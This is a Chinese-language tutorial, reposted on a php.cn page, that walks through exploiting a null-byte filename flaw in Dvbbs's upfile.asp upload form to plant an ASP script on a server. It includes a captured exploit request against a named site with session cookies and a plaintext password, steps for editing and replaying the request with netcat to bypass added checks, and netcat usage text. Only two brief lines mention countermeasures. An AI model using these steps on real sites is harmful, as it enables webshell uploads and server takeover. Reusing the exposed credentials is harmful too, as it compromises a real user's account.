PHP/ASP上传漏洞探究_PHP教程

WBOY
Freigeben: 2016-07-13 17:26:42
Original
1148 Leute haben es durchsucht

1:传漏洞利用的原理只是针对form格式上传的asp和php脚本*** nc(netcat) 用于提交数据包 dos界面下运行: nc -vv www.***.com 802:漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下 用到的变量: filepath 默认值uploadface 属性hiden act 默认值upload 属性hiden file1 就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 filename=formpath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileext -------------------------------------- 我们知道计算机里面的数据是一""为标致的用过c语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: _blank>http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: _blank>http://www.***.com/newmm.asp/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:.asp 就保存成: _blank>http://www.***.com/newmm.asp 3:后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了n个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改wse抓到的包里的filepath变量,然后在用nc提交。。。 就算他加n个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 4:详细实例: --------------------- 一、wse抓包结果(存到1.txt里): post /bbs/upphoto/upfile.asp http/1.1 accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp accept-language: zh-cn content-type: multipart/form-data; boundary=-----------7d423a138d0278 accept-encoding: gzip, deflate user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322) host: _blank>www.xin126.com content-length: 1969 connection: keep-alive cache-control: no-cache cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=eb03f6c72908fd84 -----------------------------7d423a138d0278 content-disposition: form-data; name="filepath" ../medias/myphoto/ -----------------------------7d423a138d0278 ... ... 上传 ---------------7d423a138d0278----------------- 二、ultraedit打开1.txt改数据: ...... -----------------------------7d423a138d0278 content-disposition: form-data; name="filepath" /newmm.asp█ www.xin126.com 80 16位表示:0x00或者00h 其实你改的时候就直接再filepath的结尾处加个00就ok了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... host: _blank>www.xin126.com content-length: 1969 我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就ok了 附:NC Usage: 监听外部主机 nc [-options] hostname port[s] [ports] ... 监听本地主机 nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -g num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -l listen harder, re-listen on socket close -n numeric-only ip addresses, no dns -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer telnet negotiation -u udp mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-i/o mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive]

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/531946.htmlTechArticle1:传漏洞利用的原理只是针对form格式上传的asp和php脚本*** nc(netcat) 用于提交数据包 dos界面下运行: nc -vv www.***.com 80 2:漏洞原理 下面例子...
Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage